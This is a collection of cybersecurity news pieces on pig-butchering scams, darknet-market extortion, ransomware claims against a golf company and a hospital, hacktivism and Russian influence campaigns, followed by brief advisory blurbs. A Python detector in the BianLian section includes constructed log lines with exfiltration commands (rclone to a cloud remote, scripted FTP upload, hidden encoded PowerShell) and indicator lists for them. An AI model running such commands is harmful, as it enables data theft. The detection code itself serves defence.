Today we're discussing the increasingly common scam known as pig butchering. Because it is so profitable, this scheme is rapidly gaining popularity among fraudsters, and the number of victims keeps growing. What is it? How does it work? And how can you protect yourself? We'll cover it all in today's post.

What is pig butchering and how does this scam work?

Pig butchering is a type of scam that combines investing (often in cryptocurrencies) with an online romantic or friendly relationship. Just as pigs are fattened for a long time before being slaughtered, scammers running a pig butchering scheme spend a lot of time and effort carefully courting their victims, usually over weeks or even months. In this respect pig butchering differs significantly from most fraud schemes, whose operators are usually impatient and looking for a quick profit.

The setup: a random message and a friendly stranger

It all starts with a random message in a messenger app, a social network, or SMS. The scammer either pretends to have sent the message to the wrong recipient or refers to some distant mutual acquaintance, a detail that is easy to find in the victim's social media profile. If the victim replies with something like "You've got the wrong number", the scammer politely apologizes and tries to strike up a casual conversation. Message by message, an ongoing relationship develops between victim and scammer.

Note that scammers often select their victims deliberately, based on status and personal traits: they look for reasonably well-off but perhaps lonely or vulnerable individuals who may not be opposed to chatting with a friendly stranger. At this stage the scammer's goal is to build at least a friendly relationship with the victim and, ideally, a romantic one. This earns the victim's trust and lowers their guard. As mentioned above, these scammers are in no rush and spend a lot of time talking to the victim, which is uncharacteristic of online fraudsters, so even if the victim is suspicious at first, the suspicions tend to fade after a while.
The plot thickens: an opportunity to invest profitably

Sooner or later the scammer finds a way to steer the conversation toward money. The specific approach varies, but the general idea is that the scammer carefully presents the victim with an opportunity to make a profitable investment. This could be something traditional like stocks, bonds, futures, or options, but lately it is more often some promising cryptocurrency project. The complexity and opacity of crypto, combined with how easily funds can be moved and how hard they are to recover, make it ideal for this kind of fraud.

At this stage the victim may become alarmed and suspect that something is amiss. The scammer is quick to reassure their precious... pig: there is no need for the victim to transfer any money to the scammer or to anyone associated with them. All the victim needs to do is create an account on a trading platform and deposit a small amount to see how it works.

Climax: incredible profits and new deposits

An important detail of the scheme is that at every stage the scammer carefully maintains the victim's illusion of control. The victim creates the account on the trading platform themselves and can choose what to trade there. The scammer only offers helpful advice that makes the whole process faster, easier, and, of course, as profitable as possible. The scammer's trading tips turn out to work well, who would have guessed? The victim quickly sees a first profit on the platform, gets excited, and starts depositing more and more in pursuit of bigger earnings. The catch is that the platform is controlled by the scammers, so the balances and profits it displays are whatever they choose to show.

Finale: the scammer vanishes with the money

Sooner or later the scammer absconds. This usually happens once a sizeable balance has accumulated in the account. Alternatively, the scammer may milk the victim until the moment they try to withdraw money from the platform.
That's when the victim learns the truth: the trading platform was fake, and all those incredible profits never existed. The real money was long ago sent to some unknown account. At this point the scammer cuts off all communication, deletes the accounts used for the scam, and vanishes. The victim has lost everything they put into the platform, and we are usually talking about significant amounts: the fraudsters often get away with tens or even hundreds of thousands of dollars, sometimes millions.

Scam farms in Southeast Asia

As you may have gathered from the description, this scheme differs from most scams in several ways. First, the criminals come well prepared, with effective tools for deceiving their victims. Second, they are in no hurry and are ready to work a single target for a long time, gradually moving toward their goal. Third, the sums involved are truly large, so the time and effort eventually pay off.

The secret to this success is that in the vast majority of cases it is not individual scammers behind pig butchering but large criminal groups. These organizations run huge fraud farms, most often located in the least prosperous countries of Southeast Asia. Such farms exist in Laos and the Philippines, but most are in Cambodia and, above all, Myanmar, where a civil war has been going on for several years.

(Photo: KK Park, one of the largest scam farms engaged in pig butchering, located in Myanmar near the border with Thailand; it employs over 2000 people.)

These enterprises are truly massive: a report last year about KK Park claimed that over 2000 people work there, and the farm has even earned its own Wikipedia article. Moreover, the farms are constantly expanding and, of course, new ones keep opening.
Generally speaking, these fraud farms would more accurately be called labor camps, and this is perhaps the saddest detail of the whole scheme. The rank-and-file operators of pig butchering, the people who actually talk to the victims, are usually doing so against their will. Scam enterprises need skilled, well-educated, multilingual staff with strong online communication abilities, and such people do not naturally appear in the jungles of Myanmar or Cambodia. They are usually citizens of other countries lured by the promise of high-paying jobs as call center operators, social media marketing (SMM) specialists, translators, or IT specialists.

(Photo, taken on July 1, 2023: construction of a new building at KKII, a newer part of KK Park. It has most likely been completed by now.)

New scam-farm workers usually first arrive in neighboring Thailand, from where they are taken to Myanmar or Cambodia. There they are transported to a camp far from any large populated area and have their documents confiscated. From then on these people are essentially slaves: they are forced to work 12 to 16 hours a day for nothing but food, can be subjected to violence, and are sometimes even resold to other fraudsters.

The overall scale of the problem is extremely serious. A report last year by the UN Office of the High Commissioner for Human Rights, citing credible sources, gave the following figures: at least 120,000 people are held in scam farms in Myanmar, and approximately another 100,000 in Cambodia.

How to protect yourself from pig butchering

It is difficult to calculate the total losses of pig butchering victims because it is a global problem, with scammers targeting citizens of many countries, and not everyone reports having been a victim. However, rough estimates put the size of the pig butchering industry in the billions of dollars.
It is a very lucrative business, so there is no point hoping the problem will simply go away by itself. Nor is there much hope that the authorities in Cambodia or Myanmar will address it; they appear to have other priorities. So, unfortunately, we have to protect ourselves and our loved ones on our own. Here is what we can advise:

- Be cautious with random online acquaintances, even if the person has been talking to you for a long time and does not seem to be a scammer. A long, patient courtship is precisely the signature of this scheme.
- Don't invest carelessly in obscure investment schemes, even if they apparently demonstrate high profitability. In particular, be wary of cryptocurrency schemes: the quirks of this field mean the number of scammers in it is unfortunately very high. Remember, too, that blockchain transactions are irreversible and uninsured, so there is no chargeback and no deposit guarantee to fall back on.
- Treat a platform recommended by an online acquaintance as unverified until you have checked it independently: a fake platform can display any balance and any profit it likes, and a few small successful trades prove nothing.
- Remember the golden rule of investing: the higher the potential profit, the higher the risk. With risky schemes, never invest money you are not prepared to lose.
- Tell your family and close ones about this scheme; it may protect them from financial loss, not to mention the psychological trauma that follows such a deep deception.
Borrowing from the playbook of ransomware purveyors, the darknet narcotics bazaar Incognito Market has begun extorting all of its vendors and buyers, threatening to publish cryptocurrency transaction and chat records of users who refuse to pay a fee ranging from $100 to $20,000. The bold mass extortion attempt comes just days after Incognito Market administrators reportedly pulled an "exit scam" that left users unable to withdraw millions of dollars worth of funds from the platform.

In the past 24 hours, the homepage for the Incognito Market was updated to include a blackmail message from its owners, saying they will soon release purchase records of vendors who refuse to pay to keep the records confidential.

"We got one final little nasty surprise for y'all," reads the message to Incognito Market users. "We have accumulated a list of private messages, transaction info and order details over the years. You'll be surprised at the number of people that relied on our 'auto-encrypt' functionality. And by the way, your messages and transaction IDs were never actually deleted after the 'expiry'....SURPRISE SURPRISE!!! Anyway, if anything were to leak to law enforcement, I guess nobody never slipped up."

The lesson for anyone relying on a platform's built-in "auto-encrypt" or message expiry is an old one: unless encryption happens on the client with keys the operator never sees, and unless deletion can be verified, those features are promises by the operator, not guarantees, and here the operator is the adversary.

Incognito Market says it plans to publish the entire dump of 557,000 orders and 862,000 cryptocurrency transaction IDs at the end of May. "Whether or not you and your customers' info is on that list is totally up to you," the Incognito administrators advised. "And yes, this is an extortion!!!!"

The extortion message includes a "Payment Status" page that lists the darknet market's top vendors by their handles, saying at the top that "you can see which vendors care about their customers below." The names in green supposedly correspond to users who have already opted to pay.

Incognito Market said it plans to open up a "whitelist portal" for buyers to remove their transaction records "in a few weeks."

The mass extortion of Incognito Market users comes just days after a large number of users reported they were no longer able to withdraw funds from their buyer or seller accounts. The cryptocurrency-focused publication Cointelegraph.com reported Mar. 6 that Incognito was exit-scamming its users out of their bitcoin and Monero deposits. Cointelegraph notes that Incognito Market administrators initially lied about the situation, and blamed users' difficulties in withdrawing funds on recent changes to Incognito's withdrawal systems.

Incognito Market deals primarily in narcotics, so it's likely many users are now worried about being outed as drug dealers. Creating a new account on Incognito Market presents one with an ad for 5 grams of heroin selling for $450.

The double whammy now hitting Incognito Market users is somewhat akin to the double extortion techniques employed by many modern ransomware groups, wherein victim organizations are hacked, relieved of sensitive information and then presented with two separate ransom demands: one in exchange for a digital key needed to unlock infected systems, and another to secure a promise that any stolen data will not be published or sold, and will be destroyed.

Incognito Market has priced its extortion for vendors based on their status or "level" within the marketplace. Level 1 vendors can supposedly have their information removed by paying a $100 fee. However, larger "Level 5" vendors are asked to cough up $20,000 payments.
The past is replete with examples of similar darknet market exit scams, which tend to happen eventually to all darknet markets that aren’t seized and shut down by federal investigators, said Brett Johnson, a convicted and reformed cybercriminal who built the organized cybercrime community Shadowcrew many years ago. “Shadowcrew was the precursor to today’s Darknet Markets and laid the foundation for the way modern cybercrime channels still operate today,” Johnson said. “The Truth of Darknet Markets? ALL of them are Exit Scams. The only question is whether law enforcement can shut down the market and arrest its operators before the exit scam takes place.”
In recent years, the financial industry in India has been marred by the spread of pig butchering scams, a network of fraudulent schemes targeting unsuspecting investors. These scams, which originated in China in 2020, have since evolved into a pervasive threat across several Asian countries, including India, Taiwan, and Korea. The fraudsters' modus operandi revolves around creating and distributing counterfeit trading applications designed to mimic legitimate platforms and lure investors with promises of lucrative returns.

Understanding the Pig Butchering Scams: The Beginning

The pig butchering scam, named for the way victims are "fattened up" with trust and small early gains before being bled dry, is a confidence trick used to commit investment fraud. In most pig butchering scams, scammers lure victims into making contributions, typically in cryptocurrency, to a seemingly sound investment before the party they are dealing with disappears.

These scams exploit investors' trust through deceptive practices, primarily on digital platforms such as social media and mobile applications. By masquerading as legitimate brokerage firms or trading platforms, fraudsters initiate contact with potential victims and gradually build trust and credibility before stealing their funds.

According to Cyble Research and Intelligence Labs (CRIL), the proliferation of pig butchering scams in India has been facilitated by the widespread use of social media platforms such as Facebook and Instagram. Through targeted advertisements promising substantial profits in the stock market, scammers initiate contact with individuals, often directing them to join WhatsApp or Telegram groups. Within these groups, victims are bombarded with promises of insider tips and high returns, fostering a false sense of security and trust in the scam operators.

Digging Deeper Into Pig Butchering Scams in India

The pig butchering scams in India follow a carefully orchestrated script, beginning with enticing social media advertisements that lure users into joining trading groups promising insider knowledge and lucrative investment opportunities.
Victims initially experience success as scammers recommend profitable stocks, producing small gains and building trust. The scheme then takes its turn: victims are introduced to counterfeit trading applications that promise even greater returns. Once they have invested large sums, they find themselves unable to withdraw funds and realize they have fallen prey to a scam.

CRIL's report has helped unmask the perpetrators. Investigations revealed a web of compromised developer accounts used to distribute the fraudulent applications, which means a familiar publisher name on an app listing is not by itself evidence that the app is legitimate. Chinese cybercriminals have been implicated in orchestrating these schemes, as evidenced by linguistic clues in the source code and by arrests made by Indian authorities. Scammers have also gone to great lengths to lend credibility to their operations, even impersonating reputable Indian brokerage firms.

The pig butchering scam also transcends geographical boundaries, with incidents reported beyond India's borders. Taiwan and Korea have fallen victim to similar schemes, highlighting the global reach of these fraudulent activities.

The Role of Trading Applications and Government Intervention

Counterfeit trading applications play a crucial role in these scams. By masquerading as legitimate platforms, they lure investors with substantial returns that never materialize. Phishing sites compound the problem by distributing fake applications under the guise of renowned Indian brokers, amplifying the scam's reach and sophistication.

According to a Wall Street Journal report, China has intensified efforts to dismantle cybercrime groups operating from neighboring countries and targeting individuals worldwide in pig butchering scams. In a sweeping crackdown last year, China apprehended 31,000 suspects in Myanmar, a major hub for such crimes.
This crackdown has dealt a blow to these networks, with several fraud dens eradicated, as announced by China's Ministry of Public Security. Authorities elsewhere have also intensified efforts to dismantle these scam networks, resulting in arrests and asset seizures. Recent crackdowns in India have led to the apprehension of individuals linked to Chinese cybercriminals, underscoring the international cooperation required to combat such crimes effectively.

In addition to pig butchering scams, a new threat has emerged in the form of the Telegram Task Scam. Operating on a similar premise, this scam entices victims with promises of easy tasks and lucrative rewards. As with pig butchering scams, the scheme ultimately leads to financial loss for unsuspecting participants.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
The Nicklaus Companies, led by golfing icon Jack Nicklaus, has allegedly fallen victim to a cyberattack claimed by the LockBit ransomware group. A message on the group's dark web leak site includes a countdown suggesting that compromised data will be released to the public in less than a week. Nicklaus Companies, renowned for its association with Jack William Nicklaus, affectionately known as "the Golden Bear," has a diverse portfolio spanning golf course design, real estate development, and the global marketing of lifestyle products under the Jack Nicklaus and Golden Bear brands.

LockBit Ransomware Group Claims Nicklaus Companies Cyberattack

The Cyber Express has reached out to the organization to learn more about this alleged attack. At the time of writing, no official statement or response has been received, so the claim remains unverified.

The Nicklaus Companies website appears unaffected, but that says little: a ransomware intrusion typically hits internal systems, databases, and backend infrastructure rather than the public-facing website, so an operational website is not evidence against the claim.

What makes this claim notable is that LockBit's infrastructure was recently seized by law enforcement. Operation Cronos, a collaborative effort involving authorities from the UK, the USA, Europol, and other jurisdictions, was launched to disrupt LockBit's operations and help ransomware victims recover their data.

Persistent Cyberattacks by the LockBit Ransomware Group

Progress was made with arrests in Poland and Ukraine and indictments of suspects in the USA. However, LockBit wasted no time resuming its activities on the dark web, despite law enforcement's efforts to dismantle its infrastructure and seize crucial assets. Of particular concern is LockBit's claim to possess sensitive data, including court documents related to the election subversion case involving former U.S. President Donald Trump, sourced from Fulton County, Georgia.
While there is no concrete evidence that LockBit breached the FBI, the group's display of stolen information highlights the gravity of the situation. As part of Operation Cronos, authorities shut down several dark web platforms LockBit used for data leaks and extortion demands. However, the emergence of a new dark web leak site over the weekend, featuring a list of victims that includes Fulton County and the FBI, suggests that LockBit remains undeterred.

With regard to the Nicklaus Companies cyberattack, The Cyber Express will be closely monitoring the situation and will update this post once more information on the threat actor or an official statement from the organization becomes available.
The Lindsay Municipal Hospital cyberattack has been claimed by the BianLian ransomware group, adding another U.S. institution to its list of targets. Accompanying the claim were brief notes on the hospital's profile and its history of service to the Lindsay community and surrounding areas. The hospital, a 26-bed acute care facility, also houses a Level IV emergency department, a full-service laboratory, and a radiology department offering x-rays, ultrasounds, and CT scans.

Alleged Lindsay Municipal Hospital Cyberattack Claims on Dark Web

The Cyber Express has reached out to the hospital to learn more about this alleged attack. At the time of writing, no official statement or response has been received, so the claim remains unverified.

The hospital's website appeared to be operational and showed no immediate signs of the attack. Experts speculated that the group targeted backend infrastructure rather than launching a front-end assault such as a distributed denial of service (DDoS) attack; since data-theft and ransomware intrusions rarely touch the public website, its availability says nothing about whether the claim is true.

This incident is not isolated but part of a larger wave of attacks on hospitals and healthcare providers across the United States. Just weeks earlier, on February 21st, Change Healthcare, a subsidiary of UnitedHealth Group, fell victim to a major breach.

Cyberattacks on US Hospitals: A Targeted Campaign

Described by industry experts and officials as one of the most serious cyberattacks in the history of the U.S. healthcare system, the breach at Change Healthcare disrupted critical services, including the transmission of patients' healthcare claims and financial transactions. Although the outage did not directly affect patient care systems, it exposed a glaring vulnerability in the nation's healthcare infrastructure, causing widespread frustration and financial instability.
The impact of the Change Healthcare attack reverberates across healthcare systems, affecting payment pipelines, insurance authorization, and medical records. With 14 billion annual transactions, the disruption extends beyond pharmacies to hospitals' revenue and patient care verification. CommonWell, a medical records-sharing network that relies on Change technology, halted services, affecting 208 million individuals. The suspected perpetrator, ALPHV, also known as BlackCat, has a history of ransomware attacks that has prompted global law enforcement action.

Who is the BianLian Ransomware Group?

BianLian is a ransomware group that has been targeting critical infrastructure sectors in the U.S. and Australia since June 2022. The group gains initial access through compromised RDP credentials, uses open-source tools for discovery, establishes persistence and moves laterally, and exfiltrates data via FTP or Rclone. Initially operating a double-extortion model (encryption plus data theft), it shifted to exfiltration-only extortion by 2023, threatening to publish victim data if ransom demands are not met. To pressure victims it also employs tactics such as threatening phone calls and printing ransom notes on office printers. The FBI, CISA, and the Australian Cyber Security Centre (ACSC) have published a joint advisory recommending mitigations; given the group's reliance on stolen RDP credentials, limiting exposed remote access and requiring multi-factor authentication on it are the obvious first steps, along with watching endpoints for Rclone and scripted FTP activity.

A detailed analysis by GuidePoint Security's GRIT team, authored by Drew Schmitt, sheds further light on BianLian's tradecraft: a novel PowerShell backdoor, its exploitation of TeamCity vulnerabilities for initial access, and the methods used to attribute the activity to the group.
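The exfiltration tooling attributed to BianLian above (Rclone, FTP, PowerShell) leaves recognisable traces in process-creation telemetry, and Rclone in particular is often renamed to blend in. The following is an added example, not code from the advisory, the GRIT report, or The Cyber Express: a small Python detector that runs over constructed Sysmon-style process-creation records (pipe-separated fields; the hosts, users, paths and the 203.0.113.10 address are invented) and flags rclone by its command-line shape even when the binary has been renamed, scripted `ftp -s:` uploads, and PowerShell encoded commands. The field layout and the indicator lists are assumptions chosen for the example, not a published rule.

```python
"""Heuristic detection for ransomware exfiltration tooling (Rclone, FTP,
PowerShell). Added example over constructed process-creation records; the
log format, hosts, users and paths below are invented for illustration."""
import re
from dataclasses import dataclass, field

# Constructed records: timestamp|host|user|image path|command line
CONSTRUCTED_LOG = """\
2024-03-12T03:14:07Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs -p
2024-03-12T03:15:22Z|WS-042|CORP\\jdoe|C:\\Users\\Public\\svchost.exe|svchost.exe copy "C:\\Share\\Finance" mega:finance --config C:\\Users\\Public\\r.conf --transfers 16
2024-03-12T03:20:01Z|FS-01|CORP\\svc_backup|C:\\Tools\\rclone.exe|rclone.exe sync D:\\Exports remote:bucket/exports
2024-03-12T03:31:45Z|WS-017|CORP\\mwhite|C:\\Windows\\System32\\ftp.exe|ftp -s:C:\\Users\\Public\\up.txt 203.0.113.10
2024-03-12T03:40:12Z|WS-017|CORP\\mwhite|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -enc SQBFAFgA
2024-03-12T03:41:00Z|WS-017|CORP\\mwhite|C:\\Windows\\System32\\ftp.exe|ftp
2024-03-12T09:02:11Z|WS-003|CORP\\acook|C:\\Program Files\\Git\\bin\\git.exe|git clone https://example.com/repo.git
"""

# rclone sub-commands and flags commonly seen in bulk-copy usage (assumed list)
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "lsd", "lsjson", "ls"}
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing",
                "--no-check-certificate", "--multi-thread-streams", "--bwlimit"}
# rclone remote syntax is "name:path"; requiring 2+ chars before the colon
# rules out Windows drive letters such as C:
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:")
PS_ENCODED = {"-e", "-ec", "-enc", "-encodedcommand"}


@dataclass
class Finding:
    host: str
    user: str
    image: str
    reasons: list = field(default_factory=list)


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(image: str, cmdline: str) -> list[str]:
    """Return the exfiltration indicators matched by one process-creation event."""
    name = image.rsplit("\\", 1)[-1].lower()
    tokens = tokenize(cmdline)
    args = [t.lower() for t in tokens[1:]]
    reasons = []
    # Rclone: either the real binary name, or an rclone-shaped command line
    # (verb + remote:path or rclone-specific flag) under any other name.
    looks_like_rclone = bool(
        args and args[0] in RCLONE_VERBS
        and (any(REMOTE_RE.match(t) for t in tokens[1:]) or RCLONE_FLAGS & set(args))
    )
    if name == "rclone.exe":
        reasons.append("rclone binary")
    elif looks_like_rclone:
        reasons.append(f"rclone-style command line under renamed binary {name}")
    # Scripted FTP client: "ftp -s:<script>" is how uploads get automated.
    if name == "ftp.exe" and any(a.startswith("-s:") for a in args):
        reasons.append("scripted ftp upload")
    # PowerShell launched with a base64-encoded command (loader/backdoor pattern).
    if name in {"powershell.exe", "pwsh.exe"} and PS_ENCODED & set(args):
        reasons.append("powershell encoded command")
    return reasons


def scan(log_text: str) -> list[Finding]:
    """Run classify() over every record and collect the events that matched."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, host, user, image, cmdline = line.split("|", 4)
        reasons = classify(image, cmdline)
        if reasons:
            findings.append(Finding(host, user, image, reasons))
    return findings


if __name__ == "__main__":
    for f in scan(CONSTRUCTED_LOG):
        print(f"{f.host} {f.user} {f.image}: {', '.join(f.reasons)}")
```

The renamed-binary check is the part worth keeping: matching on `rclone.exe` alone misses the second record, where the tool runs as `svchost.exe` from a user-writable directory, but the `copy ... mega:finance --config` shape still gives it away. The `git clone https://...` record shows why the verb and the remote pattern are required together; `https:` alone would otherwise look like an rclone remote.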
Nebula, an anti-Putin hacktivist group, has claimed a cyberattack on Russian election systems, targeting critical infrastructure ahead of the upcoming Russian presidential election. In a dark web post aimed directly at the Moscow government, the group said it had encrypted several systems and left a "big" ransom demand. The message, originating from the self-proclaimed "Mothership," urged the government to reconsider its actions during the election season. Nebula stressed the importance of resisting what it called a "sham" election and called on the people to unite against it. With the encrypted systems reportedly including critical government websites and networks, Nebula's message was clear: it intended to disrupt the electoral process.

Nebula Hacker Group Claims Cyberattack on Russian Election Systems

The attack hits Russia at a critical moment as the country prepares for a presidential election. President Vladimir Putin is expected to win another term, yet the campaign faces controversy as opposition candidates confront obstacles in the candidacy process. Despite efforts by opposition figures like Boris Nadezhdin and Yekaterina Duntsova, who sought to challenge Putin's stance on issues such as the campaign in Ukraine, their applications were denied. This left only a handful of candidates, all of whom support Putin's policies. Critics of the Kremlin argue that these candidates merely provide a facade of choice, while independent observers have raised concerns about electoral manipulation.

Nebula's attack adds another layer of complexity to an already tense situation. Known for previous hacks on Russian government systems, Nebula has consistently challenged the status quo, and its latest attack highlights the growing role of cyber operations in global politics, particularly around the war in Ukraine.

Who is the Nebula Hacker Group?

In addition to targeting government systems, Nebula has made headlines for infiltrating Tehtrans, a company reportedly linked to Russia's rail industry.
By gaining access to the company's cameras and even altering its website to feature a playable version of Pac-Man, Nebula demonstrated its ability to penetrate supposedly secure networks.

Nebula, a group with a pro-Ukrainian agenda, inadvertently exposed some of its own tradecraft during a breach of the Russian software company Insoft.ru: leaked screenshots showed Meterpreter shells accessing Insoft's infrastructure, apparently from IP addresses belonging to LimeNet in the Netherlands. Although the activity has been attributed to the IT Army of Ukraine (a volunteer cyberwarfare organization), Nebula's choice of targets, which has included medical entities alongside Russian ones, contradicts that group's stated philosophy. This opportunistic behavior hints at broader geopolitical tensions, with Nebula possibly sending a warning to Iran over its support for Russia. Whether this sporadic activity against Iranian assets evolves into a sustained trend remains to be seen.

More broadly, the cybersecurity landscape in Russia has become increasingly volatile, with both international and domestic hackers targeting government institutions and businesses associated with the war effort in Ukraine. Groups like NB65, reportedly composed of former Anonymous members, have breached organizations such as Roscosmos, Russia's space agency, showing that even well-resourced systems are vulnerable.
Working with countries and organizations in Africa, Asia, and the Middle East, the Tazama project aims to add affordable security and trust to the financial infrastructure.
A spate of recent typosquatting attacks shows the scourge of this type of attack is still very much with us, even after decades of cyber defender experience with it.
Rushing to onboard artificial intelligence, companies and their developers are downloading a variety of pretrained machine learning models, but verifying security and integrity remains a challenge.
Three vulnerabilities have been disclosed, including an authentication bypass, command injection, and SQL injection, with one allowing remote execution without authentication.
The company has developed open source projects like Zarf, LeapfrogAI, Pepr, and Lula to overcome technical hurdles and offers core capabilities such as Your App Your Environment, Software Factory, and AI for National Security.
Approximately 150,000 Fortinet FortiOS and FortiProxy secure web gateway systems are vulnerable to CVE-2024-21762, a critical security issue that allows code execution without authentication.
UnitedHealth Group is providing additional financial relief to healthcare providers affected by the cyberattack, including advancing funds and expanding temporary financing programs.
Microsoft is facing an ongoing attack from a Russian state-sponsored threat actor that stole data from senior-level executives and is attempting to gain unauthorized access to the company's systems.
The opening of Taiwan's Representative Office in Lithuania has prompted China to increase its focus on gathering information about the country's internal affairs and political landscape.
The leak did not connect individuals to registered entities or roles, and the organization is working with the Jersey Office of the Information Commissioner to investigate further.
Hackers attempted to sell a database allegedly belonging to the company, which is said to contain millions of records. Despite this, Paysign assured that there has been no disruption to their services, and customers can continue using their accounts.
The use of legitimate Dropbox infrastructure in the phishing campaign allowed the attackers to effectively evade detection by email security tools and bypass MFA protocols.
AI has given malicious attackers superpowers, making phishing, smishing, vishing, and other attacks more accessible and impactful. Immediate threats include sensitive data leakage from AI-powered systems.
Planet Stealer is a Go-based information-stealing trojan that targets sensitive information from victim hosts. The trojan's capabilities include browser information theft, cryptocurrency wallet theft, and sandbox evasion.
The UK government has been criticized for a lack of preparedness and strategic response to the growing threat of ransomware attacks, with a parliamentary committee accusing it of an "ostrich strategy" of burying its head in the sand.
Cisco Secure Client is affected by two high-severity vulnerabilities, CVE-2024-20337 and CVE-2024-20338, which could lead to code execution and unauthorized remote access VPN sessions.
Zama, a Paris-based startup, has raised $73 million in a Series A funding round to develop and commercialize homomorphic encryption technology for blockchain transactions and AI data exchange.
The Series A funding was led by new investors Ballistic Ventures and Artisanal Ventures, as well as existing backers Webb Investment Network, Ridge Ventures, and TechOperators.
While the nature of the cyberattack has not been disclosed, it is noted that this incident is part of a series of attacks on local authorities this year, with the latest affecting the council's ability to provide essential services.
New information from the state of California reveals that many data brokers collect and sell sensitive information, including data related to reproductive health, geolocation, and minors.
An Iranian state-backed hacking group, known as Lord Nemesis, targeted an Israeli academic administration software company called Rashim Software. The attackers used their access to infiltrate several of the company's clients.
New research by Cymulate highlights the correlation between threat exposures, vulnerabilities, misconfigurations, and security controls. It emphasizes the importance of proactive security measures to prevent cyberattacks.
The breach was limited to two systems, the Infrastructure Protection (IP) Gateway and the Chemical Security Assessment Tool (CSAT), which house critical information about U.S. infrastructure interdependency and private sector chemical security plans.
The House Energy and Commerce Committee approved two significant data privacy bills, including one targeting TikTok's Chinese ownership and another blocking data brokers from selling Americans' data to foreign adversaries.
Magnet Goblin is a financially motivated threat actor that rapidly exploits 1-day vulnerabilities in public-facing services to initiate attacks. This actor has targeted Ivanti, Magento, Qlik Sense, and possibly Apache ActiveMQ.
The Belgian village of Breendonk has experienced cyberattacks targeting both Duvel Moortgat Brewery and local coffee roasters Koffie Beyers, with the incidents occurring at the same time and in close geographic proximity.
The BianLian ransomware group exploited vulnerabilities in JetBrains TeamCity software to gain initial access to target environments. The group attempted to execute a custom Go backdoor but switched to living-off-the-land (LotL) techniques and utilized a PowerShell backdoor instead.
The developers of the Leather cryptocurrency wallet have issued a warning about a counterfeit app on the Apple App Store. This fake app has led to users reporting that it drains their wallets and steals their digital assets.
Ubuntu Security Notice 6687-1 - It was discovered that AccountsService called a helper incorrectly when performing password change operations. A local attacker could possibly use this issue to obtain encrypted passwords.
Debian Linux Security Advisory 5638-1 - It was discovered that the uv_getaddrinfo() function in libuv, an asynchronous event notification library, incorrectly truncated certain hostnames, which may result in bypass of security measures on internal APIs or SSRF attacks.
Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Besides security-related information, it will also scan for general system information, installed packages and configuration mistakes. This software aims to assist with automated auditing, software patch management, and vulnerability and malware scanning of Unix-based systems.
This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.
WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.
There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.
A recent security report from Lithuania highlights a concerning increase in Russian influence operations targeting the Baltic States and Poland. These campaigns are noted for their escalating aggressiveness and sophistication, with a notable impact on society. Since the onset of the Russia and Ukraine war, the narratives of these information campaigns have sought to reduce the apparent importance of Western sanctions on Russia’s economy, instigate hatred against Ukraine, and target Western countries. Moreover, these campaigns have aimed to create fear and panic among the populace, disrupt state institutions’ functioning, and breed dissatisfaction with government decisions within the targeted countries. Russian Influence Operations: Cyberattacks on Baltic States. Russian state actors, Moscow in particular, have made clear their intent to undermine the impact of Western sanctions, fuel animosity towards Ukraine, and push Western products out of the country. Moreover, apart from defying Western technologies and services, the cyberattacks on Baltic states and Poland inadvertently spread fear, disrupted institutional operations, and fostered public discontent. One particular tactic was the circulation of false bomb threats in Lithuanian schools, particularly during sensitive periods like the start of the school year and teachers’ strikes. These threats, made primarily through Russian-language hoax calls, placed immense pressure on national resources. Despite crackdowns on Russian propaganda outlets, Russian hacker groups have managed to bypass sanctions by replicating banned channels, thereby preserving their narratives and undermining media integrity. Recent developments, such as the launch of Sputnik radio broadcasts from Kaliningrad into Lithuanian cities, illustrate Russia’s determination to bypass sanctions and continue pushing its agenda. By combining influence operations with cyberattacks, Russia has been able to strike efficiently and anonymously. This digital toolkit has been deployed not only against the Baltic States but also against former Soviet nations like Moldova, highlighting the broader scope of hybrid threats.
Recent Cases Highlighting the Russian Campaign. With events like Moldova’s elections and EU membership referendum, Russia’s hybrid attacks and manipulation of social networks are expected to escalate, spreading hostility, undermining trust in institutions, and weakening support for Ukraine. Earlier this year, several prominent Lithuanian organizations fell victim to cyberattacks attributed to the Russian hacker group NoName ransomware. The affected organizations’ websites included Compensa Vienna Insurance Group, If Insurance, Lithuanian Roads Association, AD REM, INIT, and Balticum. In December 2023, the NoName057 hacker group allegedly executed a series of DDoS attacks on Lithuanian websites, targeting sectors such as defense, roads, logistics, mobile operators, telecommunications, internet providers, and authorization services. The threat actors not only claimed responsibility for the attacks but also criticized the Lithuanian authorities. Furthermore, a cyberattack on the Lithuanian government in July 2023, allegedly linked to the NATO summit leak, revealed sensitive information regarding the summit’s security. The hackers, operating under the name “From Russia with love,” claimed to have accessed information on officials in charge, delegation movement routes, and security systems.
